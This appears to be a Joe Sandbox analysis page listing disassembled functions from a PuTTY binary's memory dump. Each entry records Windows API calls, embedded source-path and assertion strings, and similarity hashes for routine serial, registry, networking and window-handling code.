Opcode Fuzzy Hash: 316e80de3c96355ea0dbc2ada2f34456a7c7d27d54338f355fcb179216eba0a0
Instruction Fuzzy Hash: 4221D621B1C69181F6609B1AE94027EB754FF8CBC4F584031EF4D87BAAEE2DD5518B04

Function 00007FF6BB2B5140 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 66COMMON

Download Yara Rule

APIs

ClearCommBreak.KERNEL32 ref: 00007FF6BB2B51CE
CloseHandle.KERNEL32 ref: 00007FF6BB2B51D7

Strings

Error reading from serial device, xrefs: 00007FF6BB2B5181
End of file reading from serial device, xrefs: 00007FF6BB2B5188

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: BreakClearCloseCommHandle
String ID: End of file reading from serial device$Error reading from serial device
API String ID: 2685284230-2629609604
Opcode ID: 6b940f01f1906fba524d6160f98413788f3c4b408632774ccdbae814a42b0c1e
Instruction ID: e636fc35d9aa29cee4d390599410193b2f2d004577bf06dbc5c3c4f818828be8
Opcode Fuzzy Hash: 6b940f01f1906fba524d6160f98413788f3c4b408632774ccdbae814a42b0c1e
Instruction Fuzzy Hash: CE213526B05A4641EA219B5EEAA03796360BF49BF4F044231DF6E877F1DF7CE4858700

Function 00007FF6BB2C6750 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,?,?,?,?,00000001,00000000,00007FF6BB2BDAC6), ref: 00007FF6BB2C678D
RegQueryValueExA.ADVAPI32 ref: 00007FF6BB2C67D4

Part of subcall function 00007FF6BB34B8AC: _set_error_mode.LIBCMT ref: 00007FF6BB34B8D3

Strings

size < allocsize, xrefs: 00007FF6BB2C67ED
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/utils/registry.c, xrefs: 00007FF6BB2C67F4

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: QueryValue$_set_error_mode
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/utils/registry.c$size < allocsize
API String ID: 4156801415-1544670526
Opcode ID: c97dc333d2774f8c14320e88df1a9175480c6be449bc47b7bef73eece412ac09
Instruction ID: 473b69cdc2a0bc795b29e147d58e0da0386e3e18beeb10062b7986831dbea139
Opcode Fuzzy Hash: c97dc333d2774f8c14320e88df1a9175480c6be449bc47b7bef73eece412ac09
Instruction Fuzzy Hash: 6C21F532A2C55182FA60CB1DAA00B7A7790FB8CB94F445531FE8EC3B65DE3DE4458B04

Function 00007FF6BB2A9670 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63COMMON

Download Yara Rule

APIs

IsDlgButtonChecked.USER32 ref: 00007FF6BB2A96FC

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00007FF6BB2A96C2, 00007FF6BB2A9715
c && c->ctrl->type == CTRL_RADIO, xrefs: 00007FF6BB2A96BB
false && "no radio button was checked", xrefs: 00007FF6BB2A970E

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: ButtonChecked
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && c->ctrl->type == CTRL_RADIO$false && "no radio button was checked"
API String ID: 1719414920-356531850
Opcode ID: b91bd7402ea2b7f8b39561d74d76c3503d7c52f9dd1e16645d83f87b2e1b691c
Instruction ID: 1e38d838ecb3d2c5d046002a6d264fbec60000225038b096e47f46970e980b1e
Opcode Fuzzy Hash: b91bd7402ea2b7f8b39561d74d76c3503d7c52f9dd1e16645d83f87b2e1b691c
Instruction Fuzzy Hash: E9213072B1460695EA149B5EDA822B92791FF9CB84F944035CF0DC73B1EE7DE885CB10

Function 00007FF6BB2AC7B0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38networkCOMMON

Download Yara Rule

APIs

WSAAsyncSelect.WS2_32 ref: 00007FF6BB2AC803

Part of subcall function 00007FF6BB34B8AC: _set_error_mode.LIBCMT ref: 00007FF6BB34B8D3

WSAGetLastError.WS2_32(?,?,?,?,?,?,?,00007FF6BB2A426D), ref: 00007FF6BB2AC818

Strings

winsel_hwnd, xrefs: 00007FF6BB2AC7DA
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/select-gui.c, xrefs: 00007FF6BB2AC7E1

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: AsyncErrorLastSelect_set_error_mode
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/select-gui.c$winsel_hwnd
API String ID: 3444122918-1065112538
Opcode ID: bca56f8418196c74bb67454aed4ae56006432d234296ed7eb5cbb89010fb9cce
Instruction ID: f523adebef8ba0742b34c0ea5dd9f0739ef1b4afb8c2241701ae17cbd1b0f422
Opcode Fuzzy Hash: bca56f8418196c74bb67454aed4ae56006432d234296ed7eb5cbb89010fb9cce
Instruction Fuzzy Hash: 76F02812F0851341FE251B2DAC805B902917F9CBE0F245930CE0EC33F0ED2CA4C68B00

Function 00007FF6BB285F70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetMonitorInfoA.USER32 ref: 00007FF6BB285FBC
GetDesktopWindow.USER32 ref: 00007FF6BB285FCE
GetClientRect.USER32(?,?,?,?,?,?,?,?,00000003,?,00007FF6BB28BFF2), ref: 00007FF6BB285FDA

Strings

(, xrefs: 00007FF6BB285FAC

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: ClientDesktopInfoMonitorRectWindow
String ID: (
API String ID: 2130016935-3887548279
Opcode ID: 869da3f85202917f2c61634726657b6b3a3b36bd00f5317e1fd6675bc692818f
Instruction ID: 44a6608eeb6118ce55f581823f1e3b6bc659a9f25a3b4b522f64a0dc13795ba2
Opcode Fuzzy Hash: 869da3f85202917f2c61634726657b6b3a3b36bd00f5317e1fd6675bc692818f
Instruction Fuzzy Hash: 51017121A0D64681FE119B19F85837D6360BF9DB54F585235DE4D86774EF3CE485CB00

Function 00007FF6BB287A30 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BB34C0A4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6BB33D346,?,?,?,00007FF6BB33D367,?,?,?,00007FF6BB33E81E), ref: 00007FF6BB34C0CA

GetDC.USER32 ref: 00007FF6BB287A74
SelectPalette.GDI32 ref: 00007FF6BB287A8F

Part of subcall function 00007FF6BB34B8AC: _set_error_mode.LIBCMT ref: 00007FF6BB34B8D3

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c, xrefs: 00007FF6BB287A56
!wintw_hdc, xrefs: 00007FF6BB287A4F

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: FeaturePalettePresentProcessorSelect_set_error_mode
String ID: !wintw_hdc$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c
API String ID: 1342517984-2668247132
Opcode ID: c065ac4635c1f0759df8e9c676d8566245b5593f7b757a7f583dcd20f9dfe9d9
Instruction ID: 40398be32025fec9f37b732fa8ed7c792f633d8f2208fb5fedf301f219bbf7ea
Opcode Fuzzy Hash: c065ac4635c1f0759df8e9c676d8566245b5593f7b757a7f583dcd20f9dfe9d9
Instruction Fuzzy Hash: B3F09614E1D51381FE24975DEC917B823A0BF5CB40F694030CA1DC6BB1DE7DA596CB10

Function 00007FF6BB2B4F93 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35timeCOMMON

Download Yara Rule

APIs

SetCommState.KERNEL32 ref: 00007FF6BB2B4FDE
SetCommTimeouts.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000,?,00007FF6BB2B4C35), ref: 00007FF6BB2B5000
GetLastError.KERNEL32 ref: 00007FF6BB2B500E
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000,?,00007FF6BB2B4C35), ref: 00007FF6BB2B5024

Strings

Configuring %s flow control, xrefs: 00007FF6BB2B4FC7
RTS/CTS, xrefs: 00007FF6BB2B4FA5

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: CommErrorLast$StateTimeouts
String ID: Configuring %s flow control$RTS/CTS
API String ID: 274883806-1158513486
Opcode ID: b44b983fce4d9b2e235623982e55ae96984ee89bacc88950a70bcf185397aa82
Instruction ID: 1561c72f5be1f2763484c8c0d717dee02934690584113921f97d21e343901407
Opcode Fuzzy Hash: b44b983fce4d9b2e235623982e55ae96984ee89bacc88950a70bcf185397aa82
Instruction Fuzzy Hash: 8E018F62E0C60282FA21DB2DE85117A7360FF8D780F944231EB4DD6664EE7CE685CB40

Function 00007FF6BB2B4FAE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34timeCOMMON

Download Yara Rule

APIs

SetCommState.KERNEL32 ref: 00007FF6BB2B4FDE
SetCommTimeouts.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000,?,00007FF6BB2B4C35), ref: 00007FF6BB2B5000
GetLastError.KERNEL32 ref: 00007FF6BB2B500E
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000,?,00007FF6BB2B4C35), ref: 00007FF6BB2B5024

Strings

Configuring %s flow control, xrefs: 00007FF6BB2B4FC7
DSR/DTR, xrefs: 00007FF6BB2B4FBC

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: CommErrorLast$StateTimeouts
String ID: Configuring %s flow control$DSR/DTR
API String ID: 274883806-321787297
Opcode ID: 8d2c00cf09faffd8e0b3d28f9d1cb581a55208df61ddbcf782eb45095b8adc03
Instruction ID: cfbed6c9e2527d50f75b8dec52270be623b5fc5de396779b59ee2c3a9ceba1be
Opcode Fuzzy Hash: 8d2c00cf09faffd8e0b3d28f9d1cb581a55208df61ddbcf782eb45095b8adc03
Instruction Fuzzy Hash: 7601AD22A0860282EA21DB2DE85117A7760BF8DB84F945231DB4DDA664EF7CE6C5CB40

Function 00007FF6BB2B4F85 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32timeCOMMON

Download Yara Rule

APIs

SetCommState.KERNEL32 ref: 00007FF6BB2B4FDE
SetCommTimeouts.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000,?,00007FF6BB2B4C35), ref: 00007FF6BB2B5000
GetLastError.KERNEL32 ref: 00007FF6BB2B500E
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000,?,00007FF6BB2B4C35), ref: 00007FF6BB2B5024

Strings

XON/XOFF, xrefs: 00007FF6BB2B4F8A
Configuring %s flow control, xrefs: 00007FF6BB2B4FC7

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: CommErrorLast$StateTimeouts
String ID: Configuring %s flow control$XON/XOFF
API String ID: 274883806-924046750
Opcode ID: a70ff8559d2b74fca675b73aac0676894a8e70ad610177dad5fa9eb6180550c0
Instruction ID: ad023c13c8b5a402adee771b2bc80c6302ebc2bec80d30e4a89dc0996634d89e
Opcode Fuzzy Hash: a70ff8559d2b74fca675b73aac0676894a8e70ad610177dad5fa9eb6180550c0
Instruction Fuzzy Hash: D2F0D122F0C60241FE31DB29E46027A6360BF8DB84F855231DB4D9A669DFBCE685CB40

Function 00007FF6BB289320 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 00007FF6BB289375
CloseHandle.KERNEL32 ref: 00007FF6BB289383

Part of subcall function 00007FF6BB34B8AC: _set_error_mode.LIBCMT ref: 00007FF6BB34B8D3

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c, xrefs: 00007FF6BB28933F
clipboard == CLIP_SYSTEM, xrefs: 00007FF6BB289338

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: CloseCreateHandleThread_set_error_mode
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c$clipboard == CLIP_SYSTEM
API String ID: 968033324-2875968380
Opcode ID: 46bf761cc5357dcfeca289972916d49e9bf58f751565e4c51b3a682671c676ec
Instruction ID: f478d89b598a8a5e938a6495ec7940c9427684826f066d9dc75f5e8f4b01d820
Opcode Fuzzy Hash: 46bf761cc5357dcfeca289972916d49e9bf58f751565e4c51b3a682671c676ec
Instruction Fuzzy Hash: 59F03C25A09A4685EA14DB19E89617D33A0FFCD748F94513AD74E967B4EF3CE105CB00

Function 00007FF6BB28B660 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20windowCOMMON

Download Yara Rule

APIs

GetStockObject.GDI32(?,?,?,00007FF6BB28165C), ref: 00007FF6BB28B690
SelectPalette.GDI32 ref: 00007FF6BB28B69F

Part of subcall function 00007FF6BB34B8AC: _set_error_mode.LIBCMT ref: 00007FF6BB34B8D3

Strings

wgs.term_hwnd, xrefs: 00007FF6BB28B672
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c, xrefs: 00007FF6BB28B679

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: ObjectPaletteSelectStock_set_error_mode
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c$wgs.term_hwnd
API String ID: 2940787024-833068605
Opcode ID: 9c087455c5b7a4003dbc3a6038185c98c7fa2aac56efba0b0712c6f547e69474
Instruction ID: a128e22811cb3a5e0693dba3b1884a8519147089e4fda63008a5fb7afba07bae
Opcode Fuzzy Hash: 9c087455c5b7a4003dbc3a6038185c98c7fa2aac56efba0b0712c6f547e69474
Instruction Fuzzy Hash: 4DF03914E2892281FA10975EE8943792320FF8CB94F518034CA4E86BB1EE7DA0858F00

Function 00007FF6BB35C74C Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF6BB35CB24), ref: 00007FF6BB35C86F
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF6BB35CB24), ref: 00007FF6BB35C8F9

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 97a6a1a728604af835b633fb08d4fa1beaac485fb98641618ce02cc88dab3a9d
Instruction ID: 50ade95cf147b22c5b1ada2af3fb945cf5a9433c3b60a627668669277ee6bf7f
Opcode Fuzzy Hash: 97a6a1a728604af835b633fb08d4fa1beaac485fb98641618ce02cc88dab3a9d
Instruction Fuzzy Hash: 6F91D472E1865289FB50CB6D94806BC2BA0FB4DB9CF980136DF4E976A4DFB8D481C714

Function 00007FF6BB365E04 Relevance: 6.2, APIs: 4, Instructions: 159COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB365E45
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB365EC5
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB365F19
_get_daylight.LIBCMT ref: 00007FF6BB365F71

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: _invalid_parameter_noinfo$_get_daylight
String ID:
API String ID: 72036449-0
Opcode ID: 75843eea22079b8a28dd496c4e350b59208ed88a5f1ec6f92c35adb0e747cde9
Instruction ID: 3575bfdc066385dc3383d76b21197dd473ac7af871a349cfe1fe5b73a167f455
Opcode Fuzzy Hash: 75843eea22079b8a28dd496c4e350b59208ed88a5f1ec6f92c35adb0e747cde9
Instruction Fuzzy Hash: A551DE32E0C64B86FB695A2CC8053B96690BB48754F1B4435DB4FCA2F6CE3DE8408742

Function 00007FF6BB2A5CB0 Relevance: 6.1, APIs: 4, Instructions: 117windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32 ref: 00007FF6BB2A5DCC
SendDlgItemMessageA.USER32 ref: 00007FF6BB2A5DF2
SendDlgItemMessageA.USER32 ref: 00007FF6BB2A6258

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: ItemMessageSend
String ID:
API String ID: 3015471070-0
Opcode ID: c53fec7fff811f6bb79265c08811edeec95500fd11b080b5312f59ea6d46d473
Instruction ID: 5149d6af68af947d2cd27fdbcf52cb0a868e97e147734fb7034ff56e633fdefb
